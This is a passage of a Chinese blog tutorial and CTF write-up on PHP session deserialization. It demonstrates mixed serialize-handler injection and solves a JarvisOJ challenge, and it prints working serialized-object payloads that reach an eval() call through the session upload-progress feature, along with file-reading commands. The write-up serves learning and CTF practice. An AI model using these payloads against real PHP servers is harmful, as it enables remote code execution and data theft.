<p>形成的原理就是在用<code>session.serialize_handler = php_serialize</code>存储的字符中加上<code> |</code> , 再用<code>session.serialize_handler = php</code>格式取出<code>$_SESSION</code>的值时， <code>|</code>会被当成键值对的分隔符，在特定的地方会造成反序列化漏洞。</p>
<h5 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h5><p>定义一个<code>session.php</code>文件，用于传入 <code>session</code>值，文件内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    error_reporting(<span class="hljs-number">0</span>);<br>    ini_set(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>,<span class="hljs-string">&#x27;php_serialize&#x27;</span>);<br>    session_start();<br>    <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;session&#x27;</span>] = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;session&#x27;</span>];<br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p><code>session.php</code>文件的处理器是<code>php_serialize</code></p>
<p>我们访问该页面可以往<code>$_SESSION</code>中传入值</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417155548.png" srcset="/img/loading.gif" lazyload></p>
<p>这里没有传入值，所以为N（空）</p>
<p>存在另一个<code>a.php</code> 文件，内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br>   error_reporting(<span class="hljs-number">0</span>);<br>   ini_set(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>,<span class="hljs-string">&#x27;php&#x27;</span>);<br>   session_start();<br>   <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">sayhi</span></span>&#123;<br>      <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span> = <span class="hljs-string">&#x27;eggs&#x27;</span>;<br>      <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>      <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Who are you?&quot;</span>;<br>      &#125;<br>      <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>      <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>.<span class="hljs-keyword">$this</span>-&gt;name;<br>      &#125;<br>   &#125;<br>  <span class="hljs-variable">$npc</span> = <span class="hljs-keyword">new</span> sayhi();<br> <span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p><code>a.php</code>文件的处理器是<code>php</code></p>
<p><code>a.php</code>文件的作用是在类<code>sayhi</code>反序列化开始前输出<code>Who are you?</code>，进程结束的时候输出<code>name</code>值。</p>
<p>而这个文件只会在<code>session_start()</code>时，对session文件进行序列化以及反序列化操作，而定义的<code>sayhi</code>类是不会进行反序列化操作的,没有触发魔术方法<code>__wakeup()</code>，所以直接访问时只后出现<code>echo name</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417155819.png" srcset="/img/loading.gif" lazyload></p>
<h5 id="触发漏洞"><a href="#触发漏洞" class="headerlink" title="触发漏洞"></a>触发漏洞</h5><p><strong>这个漏洞的点就在于，我们使PHP对session文件进行反序列化时，让PHP还原的类除了session文件，也包括我们传入的参数</strong></p>
<p>解释如下</p>
<p>正常情况下，当我们访问a.php，并上传一些参数时<code>http://127.0.0.1/session.php?session=123</code></p>
<p>生成的session文件：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417162604.png" srcset="/img/loading.gif" lazyload></p>
<p>session内容：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417162539.png" srcset="/img/loading.gif" lazyload></p>
<p>也就是说，本来访问<code>a.php</code>,<code>session_start()</code>执行时，会将session文件进行反序列化，反序化的字符串是这样<code>a:1:&#123;s:7:&quot;session&quot;;s:3:&quot;123&quot;;&#125;</code>。这是很正常的session文件。</p>
<p>但如果我们访问session.php时，使输入的参数为<code>|</code>，后面加上sayhi类的序列化后字符串，那么之后我们再访问a.php时，流程是怎么样的呢？</p>
<p>先在payload.php中生成sayhi类的序列化后的字符串</p>
<p>payload.php</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>   <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">sayhi</span></span>&#123;<br>      <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br>      <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>      <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Who are you?&quot;</span>;<br>      &#125;<br>      <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>      <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>.<span class="hljs-keyword">$this</span>-&gt;name;<br>      &#125;<br>   &#125;<br>  <span class="hljs-variable">$payload</span> = <span class="hljs-keyword">new</span> sayhi();<br>  <span class="hljs-variable">$payload</span>-&gt;name= <span class="hljs-string">&#x27;pig&#x27;</span>;<br>  <span class="hljs-keyword">echo</span> serialize(<span class="hljs-variable">$payload</span>);<br> <span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>获得该类的序列化字符串：</p>
<p><code>O:5:&quot;sayhi&quot;:1:&#123;s:4:&quot;name&quot;;s:3:&quot;pig&quot;;&#125;</code></p>
<p>然后在该字符串前面加上<code>|</code>，作为参数传入<code>session.php</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417164402.png" srcset="/img/loading.gif" lazyload></p>
<p>而此时的session文件中，储存的内容变成了</p>
<p><code>a:1:&#123;s:7:&quot;session&quot;;s:38:&quot;|O:5:&quot;sayhi&quot;:1:&#123;s:4:&quot;name&quot;;s:3:&quot;pig&quot;;&#125;&quot;;&#125;</code></p>
<p><code>|</code>后的字符串即为我们构造的sayhi类的序列化后的字符串。</p>
<p><strong>这样，当执行session_start()时，此时PHP对session文件进行反序化操作。而该文件被运算符|分割，这使得我们构造的sayhi类也反序列化了</strong></p>
<p>此时访问<code>a.php</code>，打印出了“how are you?”，证明我们使sayhi类反序列化成功，触发了sayhi的魔术方法<code>__wakeup()</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417164913.png" srcset="/img/loading.gif" lazyload></p>
<p><em>因为生成了两个sayhi类，程序结束后<code>__destruct()</code>也触发了两次</em></p>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>来看看一道来自来自习题爱抚的PHP session反序列化例题</p>
<p>题目地址：<a target="_blank" rel="noopener" href="http://web.jarvisoj.com:32784/index.php">http://web.jarvisoj.com:32784/index.php</a></p>
<p><em>好神奇，没想到等我找到这个地址时还能用，说不定等你来看的时候也还能用…</em></p>
<p><em>本来我是想本地环境复现的，因为有这个PHP源码，write up 中也提到了php.ini需要更改2条项相关配置…不过最开始我没有复现成功，等我对比phpinfo信息时才发现是需要更改3条配置信息🥴</em> <em>修改之后本地就能成功复现了</em></p>
<p>tmp.php</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">//A webshell is wait for you</span><br>ini_set(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>, <span class="hljs-string">&#x27;php&#x27;</span>);<br>session_start();<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">OowoO</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$mdzz</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">$this</span>-&gt;mdzz = <span class="hljs-string">&#x27;phpinfo();&#x27;</span>;<br>    &#125;<br>    <br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-keyword">$this</span>-&gt;mdzz);<br>    &#125;<br>&#125;<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;phpinfo&#x27;</span>]))<br>&#123;<br>    <span class="hljs-variable">$m</span> = <span class="hljs-keyword">new</span> OowoO();<br>&#125;<br><span class="hljs-keyword">else</span><br>&#123;<br>    highlight_string(file_get_contents(<span class="hljs-string">&#x27;tmp.php&#x27;</span>));<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>从源码上看，我们的目标应该是想办法去执行__destruct()中的eval()函数。在此之前，我们可以先传参数phpinfo来看看一些信息。</p>
<p>(因为需要满足靶场条件，这里是我去php.ini修改的)</p>
<p>PHP版本：7.3.4  其它相关设置：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417193717.png" srcset="/img/loading.gif" lazyload></p>
<p>满足以上框里 的<strong>三条</strong>设置我们就可以开始了。（第二个框里的参数前面没提到，接下来会进行解释）</p>
<p>根据前面的学习，我们的大致思路如下：构造一个OowoO类，new一个对象使其属性<code>mdzz</code>为我们想要执行的命令，然后序列化该对象并在前面加<code>|</code>，把该值上传到$_SESSION中去。再次访问tmp.php时，session_start()，使我们上传的对象反序列化，执行eval()函数。</p>
<p>但这里并没有给我们上传$_SESSION的条件，我们只有先放一下，把前面能做的事先完成。</p>
<p>先构造payload，因为类的方法不影响序列化的生成，所以只保留属性名即可</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417185331.png" srcset="/img/loading.gif" lazyload></p>
<p>加上<code>|</code>得到需要上传的字符串<code>|O:5:&quot;OowoO&quot;:1:&#123;s:4:&quot;mdzz&quot;;s:27:&quot;print_r(dirname(__FILE__));&quot;;&#125;</code></p>
<p>不过此题没有可以传入session的点，那么我们怎么改变或传入session呢？写入的方式是利用PHP中Session Upload Progress。</p>
<blockquote>
<p>PHP手册<br>Session 上传进度<br>当 session.upload_progress.enabled INI 选项开启时，PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助，但在文件上传时应用可以发送一个POST请求到终端（例如通过XHR）来检查这个状态<br>当一个上传在处理中，同时POST一个与INI中设置的session.upload_progress.name同名变量时，上传进度可以在$_SESSION中获得。 当PHP检测到这种POST请求时，它会在$_SESSION中添加一组数据, 索引是 session.upload_progress.prefix 与 session.upload_progress.name连接在一起的值。</p>
</blockquote>
<p>总之<code>session.upload_progress.cleanup</code>和<code>session.upload_progress.enabled</code>满足条件时，就可以通过POST方法来构造数据传入<code>$_SESSION</code><br>构造POST提交表单</p>
<figure class="highlight html"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">&quot;http://127.0.0.1/tmp.php&quot;</span> <span class="hljs-attr">method</span>=<span class="hljs-string">&quot;POST&quot;</span> <span class="hljs-attr">enctype</span>=<span class="hljs-string">&quot;multipart/form-data&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;123&quot;</span> /&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;file&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;file&quot;</span> /&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;submit&quot;</span> /&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>访问该页面，抓包，修改filename为我们构造的payload，注意添加<code>\</code>转义</p>
<p><code>|O:5:\&quot;OowoO\&quot;:1:&#123;s:4:\&quot;mdzz\&quot;;s:27:\&quot;print_r(dirname(__FILE__));\&quot;;&#125;</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220417194154.png" srcset="/img/loading.gif" lazyload></p>
<p>成功触发了我们构造的函数。在CTF中接下来的步骤就是继续构造payload来读文件找flag了，漏洞原理一样的，不再赘述。</p>
<p>记录一下总共用到的PHP函数分别为</p>
<p><code>print_r(dirname(__FILE__));</code> 打印当前文件路径</p>
<p><code>print_r(scandir(dirname(__FILE__)));</code> 打印大气文件目录结构</p>
<p><code>print_r(file_get_contents());</code> 读取文件内容</p>
<p>以上就是PHP session反序化相关的内容了，要是觉得意犹未尽，这里还有一个稍微复杂一点的吸体爱抚的例题：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6640#toc-10">https://xz.aliyun.com/t/6640#toc-10</a></p>
<h3 id="0x04POP链构造"><a href="#0x04POP链构造" class="headerlink" title="0x04POP链构造"></a>0x04POP链构造</h3><p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3674">https://xz.aliyun.com/t/3674</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6640">https://xz.aliyun.com/t/6640</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/13742666.html">https://www.cnblogs.com/bmjoker/p/13742666.html</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/%E7%BD%91%E5%AE%89/">网安</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Web%E5%AE%89%E5%85%A8/">Web安全</a>
                    
                      <a class="hover-with-bg" href="/tags/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">php反序列化</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/04/16/%E5%89%8D%E4%BA%BA%E6%A0%BD%E6%A0%91/">
                        <span class="hidden-mobile">前人栽树</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "DejyuTUMjI2eFz3aDorItWV1-gzGzoHsz",
          app_key: "fuBqYYOE6Y2x4Ssxcxg7OhUW",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "monsterid",
          meta: ["nick"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: true,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
<div>
  <span id="timeDate">载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("05/14/2021 10:42:10");//此处修改你的建站时间或者网站上线时间
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🐣孵化中... for&nbsp"+dnum+"&nbspdays";  //此次自定义显示内容
      document.getElementById("times").innerHTML = hnum + "&nbsphr&nbsp" + mnum + "&nbspmin&nbsp" + snum + "&nbspsec";
  }  //此次自定义显示内容
  setInterval("createtime()",250);
  </script>
</div>
<div class="text-center py-1">   
  <div>
    <span>Copyright © 2021</span></a>
    <span>Eggswoo</span></a>    <br>
  </div>
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>














  
<script src="/js/diy/diy.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/caidai.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
